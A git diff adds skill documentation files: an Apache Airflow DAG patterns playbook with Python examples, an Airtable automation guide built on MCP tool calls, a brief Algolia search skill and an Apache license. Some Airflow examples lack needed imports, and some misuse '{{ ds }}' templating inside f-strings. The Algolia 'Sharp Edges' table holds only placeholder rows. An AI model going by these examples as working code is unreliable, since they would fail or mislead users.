+- You only need a simple cron job or shell script
+- Airflow is not part of the tooling stack
+- The task is unrelated to workflow orchestration
+
+## Instructions
+
+1. Identify data sources, schedules, and dependencies.
+2. Design idempotent tasks with clear ownership and retries.
+3. Implement DAGs with observability and alerting hooks.
+4. Validate in staging and document operational runbooks.
+
+Refer to `resources/implementation-playbook.md` for detailed patterns, checklists, and templates.
+
+## Safety
+
+- Avoid changing production DAG schedules without approval.
+- Test backfills and retries carefully to prevent data duplication.
+
+## Resources
+
+- `resources/implementation-playbook.md` for detailed patterns, checklists, and templates.
diff --git a/web-app/public/skills/airflow-dag-patterns/resources/implementation-playbook.md b/web-app/public/skills/airflow-dag-patterns/resources/implementation-playbook.md
new file mode 100644
index 00000000..f70daa35
--- /dev/null
+++ b/web-app/public/skills/airflow-dag-patterns/resources/implementation-playbook.md
@@ -0,0 +1,509 @@
+# Apache Airflow DAG Patterns Implementation Playbook
+
+This file contains detailed patterns, checklists, and code samples referenced by the skill.
+
+## Core Concepts
+
+### 1. DAG Design Principles
+
+| Principle | Description |
+|-----------|-------------|
+| **Idempotent** | Running twice produces same result |
+| **Atomic** | Tasks succeed or fail completely |
+| **Incremental** | Process only new/changed data |
+| **Observable** | Logs, metrics, alerts at every step |
+
+### 2. Task Dependencies
+
+```python
+# Linear
+task1 >> task2 >> task3
+
+# Fan-out
+task1 >> [task2, task3, task4]
+
+# Fan-in
+[task1, task2, task3] >> task4
+
+# Complex
+task1 >> task2 >> task4
+task1 >> task3 >> task4
+```
+
+## Quick Start
+
+```python
+# dags/example_dag.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+from airflow.operators.empty import EmptyOperator
+
+default_args = {
+ 'owner': 'data-team',
+ 'depends_on_past': False,
+ 'email_on_failure': True,
+ 'email_on_retry': False,
+ 'retries': 3,
+ 'retry_delay': timedelta(minutes=5),
+ 'retry_exponential_backoff': True,
+ 'max_retry_delay': timedelta(hours=1),
+}
+
+with DAG(
+ dag_id='example_etl',
+ default_args=default_args,
+ description='Example ETL pipeline',
+ schedule='0 6 * * *', # Daily at 6 AM
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ tags=['etl', 'example'],
+ max_active_runs=1,
+) as dag:
+
+ start = EmptyOperator(task_id='start')
+
+ def extract_data(**context):
+ execution_date = context['ds']
+ # Extract logic here
+ return {'records': 1000}
+
+ extract = PythonOperator(
+ task_id='extract',
+ python_callable=extract_data,
+ )
+
+ end = EmptyOperator(task_id='end')
+
+ start >> extract >> end
+```
+
+## Patterns
+
+### Pattern 1: TaskFlow API (Airflow 2.0+)
+
+```python
+# dags/taskflow_example.py
+from datetime import datetime
+from airflow.decorators import dag, task
+from airflow.models import Variable
+
+@dag(
+ dag_id='taskflow_etl',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ tags=['etl', 'taskflow'],
+)
+def taskflow_etl():
+ """ETL pipeline using TaskFlow API"""
+
+ @task()
+ def extract(source: str) -> dict:
+ """Extract data from source"""
+ import pandas as pd
+
+ df = pd.read_csv(f's3://bucket/{source}/{{ ds }}.csv')
+ return {'data': df.to_dict(), 'rows': len(df)}
+
+ @task()
+ def transform(extracted: dict) -> dict:
+ """Transform extracted data"""
+ import pandas as pd
+
+ df = pd.DataFrame(extracted['data'])
+ df['processed_at'] = datetime.now()
+ df = df.dropna()
+ return {'data': df.to_dict(), 'rows': len(df)}
+
+ @task()
+ def load(transformed: dict, target: str):
+ """Load data to target"""
+ import pandas as pd
+
+ df = pd.DataFrame(transformed['data'])
+ df.to_parquet(f's3://bucket/{target}/{{ ds }}.parquet')
+ return transformed['rows']
+
+ @task()
+ def notify(rows_loaded: int):
+ """Send notification"""
+ print(f'Loaded {rows_loaded} rows')
+
+ # Define dependencies with XCom passing
+ extracted = extract(source='raw_data')
+ transformed = transform(extracted)
+ loaded = load(transformed, target='processed_data')
+ notify(loaded)
+
+# Instantiate the DAG
+taskflow_etl()
+```
+
+### Pattern 2: Dynamic DAG Generation
+
+```python
+# dags/dynamic_dag_factory.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+from airflow.models import Variable
+import json
+
+# Configuration for multiple similar pipelines
+PIPELINE_CONFIGS = [
+ {'name': 'customers', 'schedule': '@daily', 'source': 's3://raw/customers'},
+ {'name': 'orders', 'schedule': '@hourly', 'source': 's3://raw/orders'},
+ {'name': 'products', 'schedule': '@weekly', 'source': 's3://raw/products'},
+]
+
+def create_dag(config: dict) -> DAG:
+ """Factory function to create DAGs from config"""
+
+ dag_id = f"etl_{config['name']}"
+
+ default_args = {
+ 'owner': 'data-team',
+ 'retries': 3,
+ 'retry_delay': timedelta(minutes=5),
+ }
+
+ dag = DAG(
+ dag_id=dag_id,
+ default_args=default_args,
+ schedule=config['schedule'],
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ tags=['etl', 'dynamic', config['name']],
+ )
+
+ with dag:
+ def extract_fn(source, **context):
+ print(f"Extracting from {source} for {context['ds']}")
+
+ def transform_fn(**context):
+ print(f"Transforming data for {context['ds']}")
+
+ def load_fn(table_name, **context):
+ print(f"Loading to {table_name} for {context['ds']}")
+
+ extract = PythonOperator(
+ task_id='extract',
+ python_callable=extract_fn,
+ op_kwargs={'source': config['source']},
+ )
+
+ transform = PythonOperator(
+ task_id='transform',
+ python_callable=transform_fn,
+ )
+
+ load = PythonOperator(
+ task_id='load',
+ python_callable=load_fn,
+ op_kwargs={'table_name': config['name']},
+ )
+
+ extract >> transform >> load
+
+ return dag
+
+# Generate DAGs
+for config in PIPELINE_CONFIGS:
+ globals()[f"dag_{config['name']}"] = create_dag(config)
+```
+
+### Pattern 3: Branching and Conditional Logic
+
+```python
+# dags/branching_example.py
+from airflow.decorators import dag, task
+from airflow.operators.python import BranchPythonOperator
+from airflow.operators.empty import EmptyOperator
+from airflow.utils.trigger_rule import TriggerRule
+
+@dag(
+ dag_id='branching_pipeline',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+)
+def branching_pipeline():
+
+ @task()
+ def check_data_quality() -> dict:
+ """Check data quality and return metrics"""
+ quality_score = 0.95 # Simulated
+ return {'score': quality_score, 'rows': 10000}
+
+ def choose_branch(**context) -> str:
+ """Determine which branch to execute"""
+ ti = context['ti']
+ metrics = ti.xcom_pull(task_ids='check_data_quality')
+
+ if metrics['score'] >= 0.9:
+ return 'high_quality_path'
+ elif metrics['score'] >= 0.7:
+ return 'medium_quality_path'
+ else:
+ return 'low_quality_path'
+
+ quality_check = check_data_quality()
+
+ branch = BranchPythonOperator(
+ task_id='branch',
+ python_callable=choose_branch,
+ )
+
+ high_quality = EmptyOperator(task_id='high_quality_path')
+ medium_quality = EmptyOperator(task_id='medium_quality_path')
+ low_quality = EmptyOperator(task_id='low_quality_path')
+
+ # Join point - runs after any branch completes
+ join = EmptyOperator(
+ task_id='join',
+ trigger_rule=TriggerRule.NONE_FAILED_MIN_ONE_SUCCESS,
+ )
+
+ quality_check >> branch >> [high_quality, medium_quality, low_quality] >> join
+
+branching_pipeline()
+```
+
+### Pattern 4: Sensors and External Dependencies
+
+```python
+# dags/sensor_patterns.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.sensors.filesystem import FileSensor
+from airflow.providers.amazon.aws.sensors.s3 import S3KeySensor
+from airflow.sensors.external_task import ExternalTaskSensor
+from airflow.operators.python import PythonOperator
+
+with DAG(
+ dag_id='sensor_example',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+) as dag:
+
+ # Wait for file on S3
+ wait_for_file = S3KeySensor(
+ task_id='wait_for_s3_file',
+ bucket_name='data-lake',
+ bucket_key='raw/{{ ds }}/data.parquet',
+ aws_conn_id='aws_default',
+ timeout=60 * 60 * 2, # 2 hours
+ poke_interval=60 * 5, # Check every 5 minutes
+ mode='reschedule', # Free up worker slot while waiting
+ )
+
+ # Wait for another DAG to complete
+ wait_for_upstream = ExternalTaskSensor(
+ task_id='wait_for_upstream_dag',
+ external_dag_id='upstream_etl',
+ external_task_id='final_task',
+ execution_date_fn=lambda dt: dt, # Same execution date
+ timeout=60 * 60 * 3,
+ mode='reschedule',
+ )
+
+ # Custom sensor using @task.sensor decorator
+ @task.sensor(poke_interval=60, timeout=3600, mode='reschedule')
+ def wait_for_api() -> PokeReturnValue:
+ """Custom sensor for API availability"""
+ import requests
+
+ response = requests.get('https://api.example.com/health')
+ is_done = response.status_code == 200
+
+ return PokeReturnValue(is_done=is_done, xcom_value=response.json())
+
+ api_ready = wait_for_api()
+
+ def process_data(**context):
+ api_result = context['ti'].xcom_pull(task_ids='wait_for_api')
+ print(f"API returned: {api_result}")
+
+ process = PythonOperator(
+ task_id='process',
+ python_callable=process_data,
+ )
+
+ [wait_for_file, wait_for_upstream, api_ready] >> process
+```
+
+### Pattern 5: Error Handling and Alerts
+
+```python
+# dags/error_handling.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+from airflow.utils.trigger_rule import TriggerRule
+from airflow.models import Variable
+
+def task_failure_callback(context):
+ """Callback on task failure"""
+ task_instance = context['task_instance']
+ exception = context.get('exception')
+
+ # Send to Slack/PagerDuty/etc
+ message = f"""
+ Task Failed!
+ DAG: {task_instance.dag_id}
+ Task: {task_instance.task_id}
+ Execution Date: {context['ds']}
+ Error: {exception}
+ Log URL: {task_instance.log_url}
+ """
+ # send_slack_alert(message)
+ print(message)
+
+def dag_failure_callback(context):
+ """Callback on DAG failure"""
+ # Aggregate failures, send summary
+ pass
+
+with DAG(
+ dag_id='error_handling_example',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ on_failure_callback=dag_failure_callback,
+ default_args={
+ 'on_failure_callback': task_failure_callback,
+ 'retries': 3,
+ 'retry_delay': timedelta(minutes=5),
+ },
+) as dag:
+
+ def might_fail(**context):
+ import random
+ if random.random() < 0.3:
+ raise ValueError("Random failure!")
+ return "Success"
+
+ risky_task = PythonOperator(
+ task_id='risky_task',
+ python_callable=might_fail,
+ )
+
+ def cleanup(**context):
+ """Cleanup runs regardless of upstream failures"""
+ print("Cleaning up...")
+
+ cleanup_task = PythonOperator(
+ task_id='cleanup',
+ python_callable=cleanup,
+ trigger_rule=TriggerRule.ALL_DONE, # Run even if upstream fails
+ )
+
+ def notify_success(**context):
+ """Only runs if all upstream succeeded"""
+ print("All tasks succeeded!")
+
+ success_notification = PythonOperator(
+ task_id='notify_success',
+ python_callable=notify_success,
+ trigger_rule=TriggerRule.ALL_SUCCESS,
+ )
+
+ risky_task >> [cleanup_task, success_notification]
+```
+
+### Pattern 6: Testing DAGs
+
+```python
+# tests/test_dags.py
+import pytest
+from datetime import datetime
+from airflow.models import DagBag
+
+@pytest.fixture
+def dagbag():
+ return DagBag(dag_folder='dags/', include_examples=False)
+
+def test_dag_loaded(dagbag):
+ """Test that all DAGs load without errors"""
+ assert len(dagbag.import_errors) == 0, f"DAG import errors: {dagbag.import_errors}"
+
+def test_dag_structure(dagbag):
+ """Test specific DAG structure"""
+ dag = dagbag.get_dag('example_etl')
+
+ assert dag is not None
+ assert len(dag.tasks) == 3
+ assert dag.schedule_interval == '0 6 * * *'
+
+def test_task_dependencies(dagbag):
+ """Test task dependencies are correct"""
+ dag = dagbag.get_dag('example_etl')
+
+ extract_task = dag.get_task('extract')
+ assert 'start' in [t.task_id for t in extract_task.upstream_list]
+ assert 'end' in [t.task_id for t in extract_task.downstream_list]
+
+def test_dag_integrity(dagbag):
+ """Test DAG has no cycles and is valid"""
+ for dag_id, dag in dagbag.dags.items():
+ assert dag.test_cycle() is None, f"Cycle detected in {dag_id}"
+
+# Test individual task logic
+def test_extract_function():
+ """Unit test for extract function"""
+ from dags.example_dag import extract_data
+
+ result = extract_data(ds='2024-01-01')
+ assert 'records' in result
+ assert isinstance(result['records'], int)
+```
+
+## Project Structure
+
+```
+airflow/
+├── dags/
+│ ├── __init__.py
+│ ├── common/
+│ │ ├── __init__.py
+│ │ ├── operators.py # Custom operators
+│ │ ├── sensors.py # Custom sensors
+│ │ └── callbacks.py # Alert callbacks
+│ ├── etl/
+│ │ ├── customers.py
+│ │ └── orders.py
+│ └── ml/
+│ └── training.py
+├── plugins/
+│ └── custom_plugin.py
+├── tests/
+│ ├── __init__.py
+│ ├── test_dags.py
+│ └── test_operators.py
+├── docker-compose.yml
+└── requirements.txt
+```
+
+## Best Practices
+
+### Do's
+- **Use TaskFlow API** - Cleaner code, automatic XCom
+- **Set timeouts** - Prevent zombie tasks
+- **Use `mode='reschedule'`** - For sensors, free up workers
+- **Test DAGs** - Unit tests and integration tests
+- **Idempotent tasks** - Safe to retry
+
+### Don'ts
+- **Don't use `depends_on_past=True`** - Creates bottlenecks
+- **Don't hardcode dates** - Use `{{ ds }}` macros
+- **Don't use global state** - Tasks should be stateless
+- **Don't skip catchup blindly** - Understand implications
+- **Don't put heavy logic in DAG file** - Import from modules
+
+## Resources
+
+- [Airflow Documentation](https://airflow.apache.org/docs/)
+- [Astronomer Guides](https://docs.astronomer.io/learn)
+- [TaskFlow API](https://airflow.apache.org/docs/apache-airflow/stable/tutorial/taskflow.html)
diff --git a/web-app/public/skills/airtable-automation/SKILL.md b/web-app/public/skills/airtable-automation/SKILL.md
new file mode 100644
index 00000000..1a39963c
--- /dev/null
+++ b/web-app/public/skills/airtable-automation/SKILL.md
@@ -0,0 +1,170 @@
+---
+name: airtable-automation
+description: "Automate Airtable tasks via Rube MCP (Composio): records, bases, tables, fields, views. Always search tools first for current schemas."
+requires:
+ mcp: [rube]
+---
+
+# Airtable Automation via Rube MCP
+
+Automate Airtable operations through Composio's Airtable toolkit via Rube MCP.
+
+## Prerequisites
+
+- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
+- Active Airtable connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `airtable`
+- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
+
+## Setup
+
+**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
+
+
+1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
+2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `airtable`
+3. If connection is not ACTIVE, follow the returned auth link to complete Airtable auth
+4. Confirm connection status shows ACTIVE before running any workflows
+
+## Core Workflows
+
+### 1. Create and Manage Records
+
+**When to use**: User wants to create, read, update, or delete records
+
+**Tool sequence**:
+1. `AIRTABLE_LIST_BASES` - Discover available bases [Prerequisite]
+2. `AIRTABLE_GET_BASE_SCHEMA` - Inspect table structure [Prerequisite]
+3. `AIRTABLE_LIST_RECORDS` - List/filter records [Optional]
+4. `AIRTABLE_CREATE_RECORD` / `AIRTABLE_CREATE_RECORDS` - Create records [Optional]
+5. `AIRTABLE_UPDATE_RECORD` / `AIRTABLE_UPDATE_MULTIPLE_RECORDS` - Update records [Optional]
+6. `AIRTABLE_DELETE_RECORD` / `AIRTABLE_DELETE_MULTIPLE_RECORDS` - Delete records [Optional]
+
+**Key parameters**:
+- `baseId`: Base ID (starts with 'app', e.g., 'appXXXXXXXXXXXXXX')
+- `tableIdOrName`: Table ID (starts with 'tbl') or table name
+- `fields`: Object mapping field names to values
+- `recordId`: Record ID (starts with 'rec') for updates/deletes
+- `filterByFormula`: Airtable formula for filtering
+- `typecast`: Set true for automatic type conversion
+
+**Pitfalls**:
+- pageSize capped at 100; uses offset pagination; changing filters between pages can skip/duplicate rows
+- CREATE_RECORDS hard limit of 10 records per request; chunk larger imports
+- Field names are CASE-SENSITIVE and must match schema exactly
+- 422 UNKNOWN_FIELD_NAME when field names are wrong; 403 for permission issues
+- INVALID_MULTIPLE_CHOICE_OPTIONS may require typecast=true
+
+### 2. Search and Filter Records
+
+**When to use**: User wants to find specific records using formulas
+
+**Tool sequence**:
+1. `AIRTABLE_GET_BASE_SCHEMA` - Verify field names and types [Prerequisite]
+2. `AIRTABLE_LIST_RECORDS` - Query with filterByFormula [Required]
+3. `AIRTABLE_GET_RECORD` - Get full record details [Optional]
+
+**Key parameters**:
+- `filterByFormula`: Airtable formula (e.g., `{Status}='Done'`)
+- `sort`: Array of sort objects
+- `fields`: Array of field names to return
+- `maxRecords`: Max total records across all pages
+- `offset`: Pagination cursor from previous response
+
+**Pitfalls**:
+- Field names in formulas must be wrapped in `{}` and match schema exactly
+- String values must be quoted: `{Status}='Active'` not `{Status}=Active`
+- 422 INVALID_FILTER_BY_FORMULA for bad syntax or non-existent fields
+- Airtable rate limit: ~5 requests/second per base; handle 429 with Retry-After
+
+### 3. Manage Fields and Schema
+
+**When to use**: User wants to create or modify table fields
+
+**Tool sequence**:
+1. `AIRTABLE_GET_BASE_SCHEMA` - Inspect current schema [Prerequisite]
+2. `AIRTABLE_CREATE_FIELD` - Create a new field [Optional]
+3. `AIRTABLE_UPDATE_FIELD` - Rename/describe a field [Optional]
+4. `AIRTABLE_UPDATE_TABLE` - Update table metadata [Optional]
+
+**Key parameters**:
+- `name`: Field name
+- `type`: Field type (singleLineText, number, singleSelect, etc.)
+- `options`: Type-specific options (choices for select, precision for number)
+- `description`: Field description
+
+**Pitfalls**:
+- UPDATE_FIELD only changes name/description, NOT type/options; create a replacement field and migrate
+- Computed fields (formula, rollup, lookup) cannot be created via API
+- 422 when type options are missing or malformed
+
+### 4. Manage Comments
+
+**When to use**: User wants to view or add comments on records
+
+**Tool sequence**:
+1. `AIRTABLE_LIST_COMMENTS` - List comments on a record [Required]
+
+**Key parameters**:
+- `baseId`: Base ID
+- `tableIdOrName`: Table identifier
+- `recordId`: Record ID (17 chars, starts with 'rec')
+- `pageSize`: Comments per page (max 100)
+
+**Pitfalls**:
+- Record IDs must be exactly 17 characters starting with 'rec'
+
+## Common Patterns
+
+### Airtable Formula Syntax
+
+**Comparison**:
+- `{Status}='Done'` - Equals
+- `{Priority}>1` - Greater than
+- `{Name}!=''` - Not empty
+
+**Functions**:
+- `AND({A}='x', {B}='y')` - Both conditions
+- `OR({A}='x', {A}='y')` - Either condition
+- `FIND('test', {Name})>0` - Contains text
+- `IS_BEFORE({Due Date}, TODAY())` - Date comparison
+
+**Escape rules**:
+- Single quotes in values: double them (`{Name}='John''s Company'`)
+
+### Pagination
+
+- Set `pageSize` (max 100)
+- Check response for `offset` string
+- Pass `offset` to next request unchanged
+- Keep filters/sorts/view stable between pages
+
+## Known Pitfalls
+
+**ID Formats**:
+- Base IDs: `appXXXXXXXXXXXXXX` (17 chars)
+- Table IDs: `tblXXXXXXXXXXXXXX` (17 chars)
+- Record IDs: `recXXXXXXXXXXXXXX` (17 chars)
+- Field IDs: `fldXXXXXXXXXXXXXX` (17 chars)
+
+**Batch Limits**:
+- CREATE_RECORDS: max 10 per request
+- UPDATE_MULTIPLE_RECORDS: max 10 per request
+- DELETE_MULTIPLE_RECORDS: max 10 per request
+
+## Quick Reference
+
+| Task | Tool Slug | Key Params |
+|------|-----------|------------|
+| List bases | AIRTABLE_LIST_BASES | (none) |
+| Get schema | AIRTABLE_GET_BASE_SCHEMA | baseId |
+| List records | AIRTABLE_LIST_RECORDS | baseId, tableIdOrName |
+| Get record | AIRTABLE_GET_RECORD | baseId, tableIdOrName, recordId |
+| Create record | AIRTABLE_CREATE_RECORD | baseId, tableIdOrName, fields |
+| Create records | AIRTABLE_CREATE_RECORDS | baseId, tableIdOrName, records |
+| Update record | AIRTABLE_UPDATE_RECORD | baseId, tableIdOrName, recordId, fields |
+| Update records | AIRTABLE_UPDATE_MULTIPLE_RECORDS | baseId, tableIdOrName, records |
+| Delete record | AIRTABLE_DELETE_RECORD | baseId, tableIdOrName, recordId |
+| Create field | AIRTABLE_CREATE_FIELD | baseId, tableIdOrName, name, type |
+| Update field | AIRTABLE_UPDATE_FIELD | baseId, tableIdOrName, fieldId |
+| Update table | AIRTABLE_UPDATE_TABLE | baseId, tableIdOrName, name |
+| List comments | AIRTABLE_LIST_COMMENTS | baseId, tableIdOrName, recordId |
diff --git a/web-app/public/skills/algolia-search/SKILL.md b/web-app/public/skills/algolia-search/SKILL.md
new file mode 100644
index 00000000..0e0dd6dc
--- /dev/null
+++ b/web-app/public/skills/algolia-search/SKILL.md
@@ -0,0 +1,66 @@
+---
+name: algolia-search
+description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning Use when: adding search to, algolia, instantsearch, search api, search functionality."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Algolia Search Integration
+
+## Patterns
+
+### React InstantSearch with Hooks
+
+Modern React InstantSearch setup using hooks for type-ahead search.
+
+Uses react-instantsearch-hooks-web package with algoliasearch client.
+Widgets are components that can be customized with classnames.
+
+Key hooks:
+- useSearchBox: Search input handling
+- useHits: Access search results
+- useRefinementList: Facet filtering
+- usePagination: Result pagination
+- useInstantSearch: Full state access
+
+
+### Next.js Server-Side Rendering
+
+SSR integration for Next.js with react-instantsearch-nextjs package.
+
+Use instead of for SSR.
+Supports both Pages Router and App Router (experimental).
+
+Key considerations:
+- Set dynamic = 'force-dynamic' for fresh results
+- Handle URL synchronization with routing prop
+- Use getServerState for initial state
+
+
+### Data Synchronization and Indexing
+
+Indexing strategies for keeping Algolia in sync with your data.
+
+Three main approaches:
+1. Full Reindexing - Replace entire index (expensive)
+2. Full Record Updates - Replace individual records
+3. Partial Updates - Update specific attributes only
+
+Best practices:
+- Batch records (ideal: 10MB, 1K-10K records per batch)
+- Use incremental updates when possible
+- partialUpdateObjects for attribute-only changes
+- Avoid deleteBy (computationally expensive)
+
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Issue | critical | See docs |
+| Issue | high | See docs |
+| Issue | medium | See docs |
+| Issue | medium | See docs |
+| Issue | medium | See docs |
+| Issue | medium | See docs |
+| Issue | medium | See docs |
+| Issue | medium | See docs |
diff --git a/web-app/public/skills/algorithmic-art/LICENSE.txt b/web-app/public/skills/algorithmic-art/LICENSE.txt
new file mode 100644
index 00000000..7a4a3ea2
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/LICENSE.txt
@@ -0,0 +1,202 @@
+
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
\ No newline at end of file
diff --git a/web-app/public/skills/algorithmic-art/SKILL.md b/web-app/public/skills/algorithmic-art/SKILL.md
new file mode 100644
